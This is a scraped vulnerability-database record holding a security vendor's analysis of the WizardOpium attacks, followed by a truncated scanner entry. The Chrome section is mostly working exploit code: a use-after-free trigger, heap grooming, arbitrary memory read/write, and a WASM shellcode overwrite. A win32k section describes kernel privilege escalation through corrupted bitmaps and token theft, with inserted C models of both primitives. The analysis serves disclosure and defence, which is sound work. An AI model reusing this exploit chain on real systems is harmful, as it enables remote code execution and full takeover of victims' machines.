To bypass this technique the exploit uses the following primitive that simply swaps the pointer back:\n \n \n function byteSwapBigInt(x) {\n \tlet result = BigInt(0);\n \tlet tmp = x;\n \n \tfor (let i = 0; i < 8; i++) {\n \t\tresult = result << BigInt(8);\n \t\tresult += tmp & BigInt(0xFF);\n \t\ttmp = tmp >> BigInt(8);\n \t}\n \n \treturn result;\n }\n\nThe exploit uses the leaked pointer to get the address of the SuperPage structure and verifies it. If everything goes to plan, then it should be a raw pointer to a temporary_buffer_ object of the ReverbConvolverStage class that is passed to the callback function _initialUAFCallback_.\n \n \n let sharedAudioCtx;\n let iirFilterFeedforwardAllocationPtr;\n \n function initialUAFCallback(addr) {\n \tsharedAudioCtx = new OfflineAudioContext(1, 1, 3000);\n \n \tlet partitionPageIndexDelta = undefined;\n \tswitch (majorVersion) {\n \t\tcase 77: // 77.0.3865.75\n \t \tpartitionPageIndexDelta = BigInt(-26);\n \tbreak;\n \t\tcase 76: // 76.0.3809.87\n \t\tpartitionPageIndexDelta = BigInt(-25);\n \t \tbreak;\n \t}\n \n \tiirFilterFeedforwardAllocationPtr = getPartitionPageBaseWithinSuperPage(addr, getPartitionPageIndex(addr) + partitionPageIndexDelta) + BigInt(0xFF0);\n \n triggerSecondUAF(byteSwapBigInt(iirFilterFeedforwardAllocationPtr), finalUAFCallback);\n }\n\nThe exploit uses the leaked pointer to get the address of the raw pointer to the _feedforward__ array with the AudioArray<double> type that is present in the IIRProcessor object created with IIRFilterNode. This array should be located in the same SuperPage, but in different versions of Chrome this object is created in different PartitionPages and there is a special code inside initialUAFCallback to handle that.\n\nThe vulnerability is actually triggered not once but twice. After the address of the right object is acquired, the vulnerability is exploited again. 
This time the exploit uses two AudioBuffer objects of different sizes, and the previously retrieved address is sprayed inside the larger AudioBuffer. This function also executes recursively.\n \n \n let floatArray = new Float32Array(10);\n let audioBufferArray1 = [];\n let audioBufferArray2 = [];\n let imageDataArray = [];\n \n async function triggerSecondUAF(addr, doneCb) {\n \tlet counter = 0;\n \tlet numChannels = 1;\n \n \tlet audioCtx = new OfflineAudioContext(1, 0x100000, 48000);\n \n \tlet bufferSource = audioCtx.createBufferSource();\n \tlet convolver = audioCtx.createConvolver();\n \n \tlet bigAudioBuffer = audioCtx.createBuffer(numChannels, 0x100, 48000);\n \tlet smallAudioBuffer = audioCtx.createBuffer(numChannels, 0x2, 48000);\n \n \tsmallAudioBuffer.getChannelData(0).fill(0);\n \n \tfor (let i = 0; i < numChannels; i++) {\n \t\tlet channelDataArray = new BigUint64Array(bigAudioBuffer.getChannelData(i).buffer);\n \t\tchannelDataArray[0] = addr;\n \t}\n \n \tbufferSource.buffer = bigAudioBuffer;\n \tconvolver.buffer = smallAudioBuffer;\n \n \tbufferSource.loop = true;\n \tbufferSource.loopStart = 0;\n \tbufferSource.loopEnd = 1;\n \n \tbufferSource.connect(convolver);\n \tconvolver.connect(audioCtx.destination);\n \n \tbufferSource.start();\n \n \tlet finished = false;\n \n \taudioCtx.startRendering().then(function(buffer) {\n \t\tbuffer = null;\n \n \t\tif (finished) {\n \t\taudioCtx = null;\n \n \t\tsetTimeout(doneCb, 200);\n \t\treturn;\n \t\t} else {\n \t\tfinished = true;\n \n \t\tsetTimeout(function() {\n \t\ttriggerSecondUAF(addr, doneCb);\n \t\t}, 1);\n \t\t}\n \t});\n \n \twhile (!finished) {\n \t\tcounter++;\n \n \t\tconvolver.buffer = null;\n \n \t\tawait later(1); // wait 1 millisecond\n \n \t\tif (finished)\n \t\tbreak;\n \n \t\tfor (let i = 0; i < iirFilters.length; i++) {\n \t\tfloatArray.fill(0);\n \t iirFilters[i].getFrequencyResponse(floatArray, floatArray, floatArray);\n \n \t\tif (floatArray[0] != 3.1415927410125732) {\n 
\t\t\tfinished = true;\n \n \t \t\taudioBufferArray2.push(audioCtx.createBuffer(1, 1, 10000));\n \t\taudioBufferArray2.push(audioCtx.createBuffer(1, 1, 10000));\n \n \t\t\tbufferSource.disconnect();\n \t\t\tconvolver.disconnect();\n \n \t\t\treturn;\n \t\t}\n \t\t}\n \n \t\tconvolver.buffer = smallAudioBuffer;\n \n \t\tawait later(1); // wait 1 millisecond\n \t}\n }\n\nThis time the exploit uses the function _getFrequencyResponse()_ to check if exploitation was successful. The function creates an array of frequencies that is filled with a Nyquist filter and the source array for the operation is filled with zeroes.\n \n \n void IIRDSPKernel::GetFrequencyResponse(int n_frequencies,\n \tconst float* frequency_hz,\n \tfloat* mag_response,\n \tfloat* phase_response) {\n ...\n Vector<float> frequency(n_frequencies);\n double nyquist = this->Nyquist();\n // Convert from frequency in Hz to normalized frequency (0 -> 1),\n // with 1 equal to the Nyquist frequency.\n for (int k = 0; k < n_frequencies; ++k)\n \tfrequency[k] = frequency_hz[k] / nyquist;\n ...\n\nIf the resulting array contains a value other than **\u03c0**, it means exploitation was successful. If that's the case, the exploit stops its recursion and executes the function _finalUAFCallback_ to allocate the audio channel buffer again and reclaim the previously freed memory. This function also repairs the heap to prevent possible crashes by allocating various objects of different sizes and performing defragmentation of the heap. 
The exploit also creates BigUint64Array, which is used later to create an arbitrary read/write primitive.\n \n \n async function finalUAFCallback() {\n \tfor (let i = 0; i < 256; i++) {\n \t\tfloatArray.fill(0);\n \n \tiirFilters[i].getFrequencyResponse(floatArray, floatArray, floatArray);\n \n \t\tif (floatArray[0] != 3.1415927410125732) {\n \t\tawait collectGargabe();\n \n \t\taudioBufferArray2 = [];\n \n \t\tfor (let j = 0; j < 80; j++)\n \t\taudioBufferArray1.push(sharedAudioCtx.createBuffer(1, 2, 10000));\n \n \t\tiirFilters = new Array(1);\n \t \t\tawait collectGargabe();\n \n \t\tfor (let j = 0; j < 336; j++)\n \t\t\timageDataArray.push(new ImageData(1, 2));\n \t\timageDataArray = new Array(10);\n \t\tawait collectGargabe();\n \n \t\tfor (let j = 0; j < audioBufferArray1.length; j++) {\n \t\t\tlet auxArray = new BigUint64Array(audioBufferArray1[j].getChannelData(0).buffer);\n \t\t\tif (auxArray[0] != BigInt(0)) {\n \t\t\tkickPayload(auxArray);\n \t\t\treturn;\n \t\t\t}\n \t\t}\n \n \t\treturn;\n \t\t}\n \t}\n }\n\nHeap defragmentation is performed with multiple calls to the improvised _collectGarbage_ function that creates a huge ArrayBuffer in a loop.\n \n \n function collectGargabe() {\n \tlet promise = new Promise(function(cb) {\n \t\tlet arg;\n \t\tfor (let i = 0; i < 400; i++)\n \t\tnew ArrayBuffer(1024 * 1024 * 60).buffer;\n \t\tcb(arg);\n \t});\n \treturn promise;\n }\n\nAfter those steps, the exploit executes the function _kickPayload()_ passing the previously created BigUint64Array containing the raw pointer address of the previously freed AudioArray's data.\n \n \n async function kickPayload(auxArray) {\n \tlet audioCtx = new OfflineAudioContext(1, 1, 3000);\n \tlet partitionPagePtr = getPartitionPageMetadataArea(byteSwapBigInt(auxArray[0]));\n \tauxArray[0] = byteSwapBigInt(partitionPagePtr);\n \tlet i = 0;\n \tdo {\n \t\tgcPreventer.push(new ArrayBuffer(8));\n \t\tif (++i > 0x100000)\n \t\treturn;\n \t} while (auxArray[0] != BigInt(0));\n \tlet 
freelist = new BigUint64Array(new ArrayBuffer(8));\n \tgcPreventer.push(freelist);\n \t...\n\nThe exploit manipulates the PartitionPage metadata of the freed object to achieve the following behavior. If the address of another object is written in BigUint64Array at index zero and if a new 8-byte object is created and the value located at index 0 is read back, then a value located at the previously set address will be read. If something is written at index 0 at this stage, then this value will be written to the previously set address instead.\n \n \n function read64(rwHelper, addr) {\n \trwHelper[0] = addr;\n \tvar tmp = new BigUint64Array;\n \ttmp.buffer;\n \tgcPreventer.push(tmp);\n \treturn byteSwapBigInt(rwHelper[0]);\n }\n \n function write64(rwHelper, addr, value) {\n \trwHelper[0] = addr;\n \tvar tmp = new BigUint64Array(1);\n \ttmp.buffer;\n \ttmp[0] = value;\n \tgcPreventer.push(tmp);\n }\n\nAfter the building of the arbitrary read/write primitives comes the final stage \u2013 executing the code. The exploit achieves this by using a popular technique that exploits the Web Assembly (WASM) functionality. Google Chrome currently allocates pages for just-in-time (JIT) compiled code with read/write/execute (RWX) privileges and this can be used to overwrite them with shellcode. At first, the exploit initiates a \"dummy\" WASM module and it results in the allocation of memory pages for JIT compiled code.\n \n \n const wasmBuffer = new Uint8Array([...]);\n const wasmBlob = new Blob([wasmBuffer], {\n \ttype: \"application/wasm\"\n });\n \n const wasmUrl = URL.createObjectURL(wasmBlob);\n var wasmFuncA = undefined;\n WebAssembly.instantiateStreaming(fetch(wasmUrl), {}).then(function(result) {\n \twasmFuncA = result.instance.exports.a;\n });\n\nTo execute the exported function _wasmFuncA_, the exploit creates a FileReader object. When this object is initiated with data it creates a FileReaderLoader object internally. 
If you can parse PartitionAlloc allocator structures and know the size of the next object that will be allocated, you can predict which address it will be allocated to. The exploit uses the _getPartitionPageFreeListHeadEntryBySlotSize()_ function with the provided size and gets the address of the next free block that will be allocated by FileReaderLoader.\n \n \n let fileReader = new FileReader;\n let fileReaderLoaderSize = 0x140;\n let fileReaderLoaderPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, fileReaderLoaderSize);\n if (!fileReaderLoaderPtr)\n \treturn;\n \n fileReader.readAsArrayBuffer(new Blob([]));\n \n let fileReaderLoaderTestPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, fileReaderLoaderSize);\n if (fileReaderLoaderPtr == fileReaderLoaderTestPtr)\n \treturn;\n\nThe exploit obtains this address twice to find out if the FileReaderLoader object was created and if the exploit can continue execution. 
The exploit sets the exported WASM function to be a callback for a FileReader event (in this case, an onerror callback) and because the FileReader type is derived from EventTargetWithInlineData, it can be used to get the addresses of all its events and the address of the JIT compiled exported WASM function.\n \n \n fileReader.onerror = wasmFuncA;\n \n let fileReaderPtr = read64(freelist, fileReaderLoaderPtr + BigInt(0x10)) - BigInt(0x68);\n \n let vectorPtr = read64(freelist, fileReaderPtr + BigInt(0x28));\n let registeredEventListenerPtr = read64(freelist, vectorPtr);\n let eventListenerPtr = read64(freelist, registeredEventListenerPtr);\n let eventHandlerPtr = read64(freelist, eventListenerPtr + BigInt(0x8));\n let jsFunctionObjPtr = read64(freelist, eventHandlerPtr + BigInt(0x8));\n \n let jsFunctionPtr = read64(freelist, jsFunctionObjPtr) - BigInt(1);\n let sharedFuncInfoPtr = read64(freelist, jsFunctionPtr + BigInt(0x18)) - BigInt(1);\n let wasmExportedFunctionDataPtr = read64(freelist, sharedFuncInfoPtr + BigInt(0x8)) - BigInt(1);\n let wasmInstancePtr = read64(freelist, wasmExportedFunctionDataPtr + BigInt(0x10)) - BigInt(1);\n \n let stubAddrFieldOffset = undefined;\n switch (majorVersion) {\n \tcase 77:\n \t\tstubAddrFieldOffset = BigInt(0x8) * BigInt(16);\n \tbreak;\n \tcase 76:\n \t\tstubAddrFieldOffset = BigInt(0x8) * BigInt(17);\n \tbreak\n }\n \n let stubAddr = read64(freelist, wasmInstancePtr + stubAddrFieldOffset);\n\nThe variable stubAddr contains the address of the page with the stub code that jumps to the JIT compiled WASM function. At this stage it's sufficient to overwrite it with shellcode. To do so, the exploit uses the function _getPartitionPageFreeListHeadEntryBySlotSize()_ again to find the next free block of 0x20 bytes, which is the size of the structure for the ArrayBuffer object. 
This object is created when the exploit creates a new audio buffer.\n \n \n let arrayBufferSize = 0x20;\n let arrayBufferPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, arrayBufferSize);\n if (!arrayBufferPtr)\n \treturn;\n \n let audioBuffer = audioCtx.createBuffer(1, 0x400, 6000);\n gcPreventer.push(audioBuffer);\n\nThe exploit uses arbitrary read/write primitives to get the address of the DataHolder class that contains the raw pointer to the data and size of the audio buffer. The exploit overwrites this pointer with stubAddr and sets a huge size.\n \n \n let dataHolderPtr = read64(freelist, arrayBufferPtr + BigInt(0x8));\n \n write64(freelist, dataHolderPtr + BigInt(0x8), stubAddr);\n write64(freelist, dataHolderPtr + BigInt(0x10), BigInt(0xFFFFFFF));\n\nNow all that's needed is to implant a Uint8Array object into the memory of this audio buffer and place shellcode there along with the Portable Executable that will be executed by the shellcode.\n \n \n let payloadArray = new Uint8Array(audioBuffer.getChannelData(0).buffer);\n payloadArray.set(shellcode, 0);\n payloadArray.set(peBinary, shellcode.length);\n\nTo prevent the possibility of a crash the exploit clears the pointer to the top of the FreeList structure used by the PartitionPage.\n \n \n write64(freelist, partitionPagePtr, BigInt(0));\n\nNow, in order to execute the shellcode, it's enough to call the exported WASM function.\n \n \n try {\n \twasmFuncA();\n } catch (e) {}\n\n## Microsoft Windows elevation of privilege exploit\n\nThe shellcode appeared to be a Reflective PE loader for the Portable Executable module that was also present in the exploit. This module mostly consisted of the code to escape Google Chrome's sandbox by exploiting the Windows kernel component win32k for the elevation of privileges and it was also responsible for downloading and executing the actual malware. 
On closer analysis, we found that the exploited vulnerability was in fact a zero-day. We notified Microsoft Security Response Center and they assigned it CVE-2019-1458 and fixed the vulnerability. The win32k component has something of a bad reputation. It has been present since Windows NT 4.0 and, according to Microsoft, it is responsible for more than 50% of all kernel security bugs. In the last two years alone Kaspersky has found five zero-days in the wild that exploited win32k vulnerabilities. That's quite an interesting statistic considering that, since the release of Windows 10, Microsoft has implemented a number of mitigations aimed at complicating exploitation of win32k vulnerabilities; accordingly, the majority of the zero-days we found targeted versions of Microsoft Windows prior to the release of Windows 10 RS4. The elevation of privilege exploit used in Operation WizardOpium was built to support Windows 7, Windows 10 build 10240 and Windows 10 build 14393. It's also important to note that Google Chrome has a special security feature called [Win32k lockdown](<https://googleprojectzero.blogspot.com/2016/11/breaking-chain.html>). This security feature eliminates the whole win32k attack surface by disabling access to win32k syscalls from inside Chrome processes. Unfortunately, Win32k lockdown is only supported on machines running Windows 10. So, it's fair to assume that Operation WizardOpium targeted users running Windows 7.\n\nCVE-2019-1458 is an arbitrary pointer dereference vulnerability. In win32k, window objects are represented by a tagWND structure. There are also a number of classes based on this structure: ScrollBar, Menu, Listbox, Switch and many others. The FNID field of the tagWND structure is used to distinguish the class. Different classes also have various extra data appended to the tagWND structure. This extra data is basically just different structures that often include kernel pointers. 
Besides that, in the win32k component there's a syscall SetWindowLongPtr that can be used to set this extra data (after validation, of course). It's worth noting that SetWindowLongPtr was related to a number of vulnerabilities in the past (e.g., CVE-2010-2744, CVE-2016-7255, and CVE-2019-0859). There's a [common issue](<https://securelist.com/new-win32k-zero-day-cve-2019-0859/90435/>) in which pre-initialized extra data leads system procedures to handle it incorrectly. In the case of CVE-2019-1458, the validation performed by SetWindowLongPtr was simply insufficient.\n \n \n xxxSetWindowLongPtr(tagWND *pwnd, int index, QWORD data, ...)\n \t...\n \tif ( (int)index >= gpsi->mpFnid_serverCBWndProc[(pwnd->fnid & 0x3FFF) - 0x29A] - sizeof(tagWND) )\n \t\t...\n \t\textraData = (BYTE*)tagWND + sizeof(tagWND) + index\n \t\told = *(QWORD*)extraData;\n \t\t*(QWORD*)extraData = data;\n \t\treturn old;\n\nThe check on the index parameter should have prevented this bug: each entry of the mpFnid_serverCBWndProc table holds the size of tagWND plus the extra bytes that the corresponding system class reserves for its own state, so a write is only allowed at an index past that reserved region. But prior to the patch the entries for FNID_DESKTOP, FNID_SWITCH and FNID_TOOLTIPS were never initialized, so for those classes the computed lower bound was zero minus sizeof(tagWND), a negative number that any index satisfies. That rendered the check useless and allowed the kernel pointers inside the extra data to be overwritten.\n\nTriggering the bug is quite simple: first, you create a Window; then NtUserMessageCall can be used to call any system class window procedure.\n \n \n gpsi->mpFnidPfn[(dwType + 6) & 0x1F]((tagWND *)wnd, msg, wParam, lParam, resultInfo);\n\nIt's important to provide the right message and dwType parameters. The message needs to be equal to WM_CREATE. dwType is converted to fnIndex internally with the following calculation: (dwType + 6) & 0x1F. The exploit uses a dwType equal to 0xE0. 
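As an added illustration, not code from the Securelist write-up or from win32k itself, the C model below reproduces the shape of this check with the table entry for the Switch class left at zero (the unpatched state) next to an initialized entry, and includes the dwType-to-fnIndex calculation performed by NtUserMessageCall. The FNID values (FNID_SWITCH = 0x2A0, so its table slot is 6), sizeof(tagWND) = 0x128 (the constant 296 in the xxxSwitchWndProc check) and the simplified upper-bound test against cbwndExtra are assumptions made for the example.

```c
/* Added example: user-mode model of the xxxSetWindowLongPtr index check.
 * Not win32k code; FNID values, TAGWND_SIZE and the upper bound are assumed. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define FNID_FIRST    0x29A
#define FNID_SWITCH   0x2A0          /* assumption: (0x2A0 & 0x3FFF) - 0x29A == 6 */
#define FNID_BUTTON   0x2A1          /* assumption: table slot 7 */
#define TAGWND_SIZE   0x128          /* assumed sizeof(tagWND), from "cbwndExtra + 296" */
#define FNID_COUNT    32

/* Per-class size of tagWND plus the extra bytes the system class reserves for
 * its own (kernel-pointer-bearing) state. SetWindowLongPtr may only touch
 * extra data at or beyond that reserved region. */
static int32_t mpFnid_serverCBWndProc[FNID_COUNT];

void init_fnid_table(int patched)
{
    memset(mpFnid_serverCBWndProc, 0, sizeof mpFnid_serverCBWndProc);
    /* Most classes had their entry filled in; the Switch class did not. */
    mpFnid_serverCBWndProc[FNID_BUTTON - FNID_FIRST] = TAGWND_SIZE + 8;
    if (patched)
        mpFnid_serverCBWndProc[FNID_SWITCH - FNID_FIRST] = TAGWND_SIZE + 8;
}

/* Returns 1 if an 8-byte write at extra-data offset `index` is allowed for a
 * window of class `fnid` created with `cbwndExtra` bytes of extra data. */
int set_window_long_ptr_allowed(uint16_t fnid, int index, int cbwndExtra)
{
    int slot = (fnid & 0x3FFF) - FNID_FIRST;
    if (slot < 0 || slot >= FNID_COUNT)
        return 0;
    /* The check from the text. With an unset table entry (0) the reserved
     * size is 0 - sizeof(tagWND), i.e. negative, so index 0 passes. */
    int32_t reserved = mpFnid_serverCBWndProc[slot] - TAGWND_SIZE;
    if (index < reserved)
        return 0;
    return index >= 0 && index + 8 <= cbwndExtra;   /* simplified upper bound */
}

/* NtUserMessageCall: dwType selects the system window procedure. */
int fn_index(unsigned dwType)
{
    return (int)((dwType + 6) & 0x1F);
}

int main(void)
{
    int cbwndExtra = 0x20;   /* window created with 32 bytes of extra data */
    init_fnid_table(0);
    printf("unpatched: index 0 on FNID_SWITCH allowed = %d\n",
           set_window_long_ptr_allowed(FNID_SWITCH, 0, cbwndExtra));
    init_fnid_table(1);
    printf("patched:   index 0 on FNID_SWITCH allowed = %d\n",
           set_window_long_ptr_allowed(FNID_SWITCH, 0, cbwndExtra));
    printf("dwType 0xE0 -> fnIndex %d\n", fn_index(0xE0));
    return 0;
}
```

With the unpatched table, index 0 passes for the Switch class because the lower bound is 0 - 0x128; with the entry filled in, the same write is rejected and only offsets at or beyond the reserved 8 bytes are accepted. For dwType 0xE0, fn_index() returns 6.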
It results in an fnIndex equal to 6, which is the function index of _xxxSwitchWndProc_, and the WM_CREATE message sets the FNID field to be equal to FNID_SWITCH.\n \n \n LRESULT xxxSwitchWndProc(tagWND *wnd, UINT msg, WPARAM wParam, LPARAM lParam)\n {\n ...\n pti = *(tagTHREADINFO **)&gptiCurrent;\n if ( wnd->fnid != FNID_SWITCH )\n {\n if ( wnd->fnid || wnd->cbwndExtra + 296 < (unsigned int)gpsi->mpFnid_serverCBWndProc[6] )\n return 0i64;\n if ( msg != 1 )\n return xxxDefWindowProc(wnd, msg, wParam, lParam);\n if ( wnd[1].head.h )\n return 0i64;\n wnd->fnid = FNID_SWITCH;\n }\n switch ( msg )\n {\n case WM_CREATE:\n zzzSetCursor(wnd->pcls->spcur, pti, 0i64);\n break;\n case WM_CLOSE:\n xxxSetWindowPos(wnd, 0, 0);\n xxxCancelCoolSwitch();\n break;\n case WM_ERASEBKGND:\n case WM_FULLSCREEN:\n pti->ptl = (_TL *)&pti->ptl;\n ++wnd->head.cLockObj;\n xxxPaintSwitchWindow(wnd, pti, 0i64);\n ThreadUnlock1();\n return 0i64;\n }\n return xxxDefWindowProc(wnd, msg, wParam, lParam);\n }\n\nThe vulnerability in _NtUserSetWindowLongPtr_ can then be used to overwrite the extra data at index zero, which happens to be a pointer to a structure containing information about the Switch Window. In other words, the vulnerability makes it possible to set an arbitrary kernel pointer that will be treated as this structure.\n\nAt this stage it's enough to call _NtUserMessageCall_ again, but this time with a message equal to WM_ERASEBKGND. This results in the execution of the function _xxxPaintSwitchWindow_, which increments and decrements a couple of integers located at fixed offsets from the pointer we previously set.\n \n \n sub [rdi+60h], ebx\n add [rdi+68h], ebx\n ...\n sub [rdi+5Ch], ecx\n add [rdi+64h], ecx\n\nAn important condition for triggering the exploitable code path is that the ALT key needs to be pressed.\n\nExploitation is performed by abusing Bitmaps. For successful exploitation a few Bitmaps need to be allocated next to each other, and their kernel addresses need to be known. 
To achieve this, the exploit uses two common kernel ASLR bypass techniques. For Windows 7 and Windows 10 build 10240 (Threshold 1) the Bitmap kernel addresses are leaked via the GdiSharedHandleTable [technique](<https://www.coresecurity.com/blog/abusing-gdi-for-ring0-exploit-primitives>): in older versions of the OS there is a special table available at the user level that holds the kernel addresses of all GDI objects present in the process. This particular technique was patched in Windows 10 build 14393 (Redstone 1), so for this version the exploit uses another common [technique](<https://labs.f-secure.com/archive/a-tale-of-bitmaps/>) that abuses Accelerator Tables (patched in Redstone 2). It involves creating an Accelerator Table object, leaking its kernel address from the gSharedInfo HandleTable available at the user level, and then freeing the Accelerator Table object and allocating a Bitmap that reuses the same memory address.\n\nThe whole exploitation process works as follows: the exploit creates three bitmaps located next to each other and leaks their addresses. The exploit prepares a Switch Window and uses the vulnerability in NtUserSetWindowLongPtr to set an address pointing near the end of the first Bitmap as the Switch Window extra data. Bitmaps are represented by a SURFOBJ structure, and the previously set address needs to be calculated in a way that makes the xxxPaintSwitchWindow function increment the sizlBitmap field of the SURFOBJ structure of the Bitmap allocated next to the first one. The sizlBitmap field indicates the bounds of the pixel data buffer, and the incremented value allows the use of the function SetBitmapBits() to perform an out-of-bounds write and overwrite the SURFOBJ of the third Bitmap object.\n\nThe pvScan0 field of the SURFOBJ structure is the address of the pixel data buffer, so the ability to overwrite it with an arbitrary pointer results in arbitrary read/write primitives via the functions GetBitmapBits()/SetBitmapBits(). 
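To make the primitive concrete, here is an added user-mode model, not code from the write-up or from win32k, of the three-bitmap layout: the SURFOBJ is reduced to sizlBitmap, pvScan0 and an inline pixel buffer, the three objects sit back to back in a byte array that stands in for the kernel pool, and a "kernel address" is an offset into that array. The field layout, the buffer sizes and the one-byte-per-pixel assumption are illustrative only; what carries over is that sizlBitmap is the only bound on Get/SetBitmapBits, so bumping the second bitmap's size reaches the third bitmap's header, and controlling that header's pvScan0 turns the third bitmap into a read/write window over arbitrary memory.

```c
/* Added example: model of the GDI bitmap read/write primitive. Not win32k
 * code; the SURFOBJ layout, sizes and the arena are assumptions. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Reduced SURFOBJ: only the fields the technique relies on (assumed layout). */
typedef struct {
    uint32_t cx, cy;       /* sizlBitmap: bounds of the pixel buffer (1 byte/pixel) */
    uint64_t pvScan0;      /* pointer to pixel data; an arena offset in this model */
    uint8_t  bits[64];     /* inline pixel data of an 8x8 bitmap */
} Bitmap;

#define ARENA_SIZE 4096
static union { uint8_t bytes[ARENA_SIZE]; uint64_t align; } pool; /* stands in for the kernel pool */
static uint8_t *const arena = pool.bytes;

static Bitmap *bmp(int i) { return (Bitmap *)(arena + i * sizeof(Bitmap)); }

/* Three adjacent bitmaps whose addresses are known (the ASLR bypass step). */
void create_bitmaps(void)
{
    memset(arena, 0, ARENA_SIZE);
    for (int i = 0; i < 3; i++) {
        Bitmap *b = bmp(i);
        b->cx = 8;
        b->cy = 8;
        b->pvScan0 = (uint64_t)(b->bits - arena);
    }
}

/* SetBitmapBits/GetBitmapBits copy at most cx*cy bytes at pvScan0; sizlBitmap
 * is the only bound, which is why corrupting it yields an out-of-bounds write. */
size_t set_bitmap_bits(Bitmap *b, const uint8_t *src, size_t n)
{
    size_t limit = (size_t)b->cx * b->cy;
    if (n > limit) n = limit;
    if (b->pvScan0 + n > ARENA_SIZE) return 0;   /* arena guard, not a GDI check */
    memcpy(arena + b->pvScan0, src, n);
    return n;
}

size_t get_bitmap_bits(const Bitmap *b, uint8_t *dst, size_t n)
{
    size_t limit = (size_t)b->cx * b->cy;
    if (n > limit) n = limit;
    if (b->pvScan0 + n > ARENA_SIZE) return 0;
    memcpy(dst, arena + b->pvScan0, n);
    return n;
}

/* Stand-in for the "add [rdi+68h], ebx" in xxxPaintSwitchWindow: the extra-data
 * pointer is chosen so that the add lands on bitmap 1's cy field. */
void corrupt_adjacent_size(uint32_t delta)
{
    bmp(1)->cy += delta;
}

/* Write bitmap 1 out of bounds so that bitmap 2's pvScan0 becomes `addr`. */
static int retarget_bitmap2(uint64_t addr)
{
    uint8_t window[256];
    size_t span = (size_t)((uint8_t *)&bmp(2)->pvScan0 - bmp(1)->bits) + sizeof addr;
    if (get_bitmap_bits(bmp(1), window, span) != span)
        return 0;                        /* sizlBitmap still intact: no reach */
    memcpy(window + span - sizeof addr, &addr, sizeof addr);
    return set_bitmap_bits(bmp(1), window, span) == span;
}

/* Arbitrary read/write through bitmap 2 once its pvScan0 is under control. */
uint64_t kread64(uint64_t addr)
{
    uint64_t v = 0;
    if (retarget_bitmap2(addr))
        get_bitmap_bits(bmp(2), (uint8_t *)&v, sizeof v);
    return v;
}

int kwrite64(uint64_t addr, uint64_t v)
{
    return retarget_bitmap2(addr) &&
           set_bitmap_bits(bmp(2), (const uint8_t *)&v, sizeof v) == sizeof v;
}

int main(void)
{
    create_bitmaps();
    printf("before corruption: kwrite64 ok = %d\n", kwrite64(3000, 0x41));
    corrupt_adjacent_size(8);            /* bitmap 1 now claims 8x16 = 128 bytes */
    printf("after corruption:  kwrite64 ok = %d, readback = 0x%llx\n",
           kwrite64(3000, 0x1122334455667788ULL),
           (unsigned long long)kread64(3000));
    return 0;
}
```

Before the size corruption, bitmap 1 can reach only its own 64 bytes and retarget_bitmap2() fails; after cy grows from 8 to 16, an 80-byte SetBitmapBits() on bitmap 1 runs into bitmap 2's header and rewrites its pvScan0, after which every Get/SetBitmapBits() on bitmap 2 reads or writes at the chosen address. In the real exploit the same two operations are then used to walk EPROCESS and copy the System token.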
The exploit uses these primitives to parse the EPROCESS structure and steal the system token. To get the kernel address of the EPROCESS structure, the exploit uses the function [EnumDeviceDrivers](<https://docs.microsoft.com/en-us/windows/win32/api/psapi/nf-psapi-enumdevicedrivers>). This function works exactly as its MSDN description says: it provides a list of kernel load addresses for the currently loaded drivers. The first address in the list is the base address of ntoskrnl, and to get the offset to the EPROCESS structure the exploit parses the kernel executable in search of the exported PsInitialSystemProcess variable, which holds a pointer to the EPROCESS of the System process.\n\nIt's worth noting that this technique still works in the latest versions of Windows (tested with Windows 10 19H1 build 18362). Stealing the system token is the most common post-exploitation technique that we see in the majority of elevation of privilege exploits. After acquiring system privileges the exploit downloads and executes the actual malware.\n\n## Conclusions\n\nIt was particularly interesting for us to examine the Chrome exploit because it was the first Google Chrome in-the-wild zero-day encountered for a while. It was also interesting that it was used in combination with an elevation of privilege exploit that didn't allow exploitation on the latest versions of Windows, mostly due to the Win32k lockdown security feature of Google Chrome. With regards to privilege elevation, it was also interesting that we found another 1-day exploit for this vulnerability just one week after the patch, indicating how simple it is to exploit this vulnerability.\n\n_We would like to thank the Google Chrome and Microsoft security teams for fixing these vulnerabilities so quickly. Google was generous enough to offer a bounty for CVE-2019-13720. 
The reward was donated to charity and Google matched the donation._", "modified": "2020-05-28T10:00:09", "published": "2020-05-28T10:00:09", "id": "SECURELIST:FED90A1B8959D4636DBADB1E135F7BF7", "href": "https://securelist.com/the-zero-day-exploits-of-operation-wizardopium/97086/", "type": "securelist", "title": "The zero-day exploits of Operation WizardOpium", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-03-01T06:19:02", "description": "The remote Windows host is missing a security update. It is,\ntherefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n Windows kernel that allows a local attacker, via a\n specially crafted application, to bypass the Address\n Space Layout Randomization (ASLR) feature and retrieve\n the memory address of a kernel object. (CVE-2016-7214)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Windows kernel-mode driver due to improper handling\n of objects in memory. A local attacker can exploit\n these, via a specially crafted application, to execute\n arbitrary code in kernel mode. (CVE-2016-7215,\n CVE-2016-7246, CVE-2016-7255)\n\n - An information disclosure vulnerability exists in the\n bowser.sys kernel-mode driver due to improper handling\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to disclose\n sensitive information. 
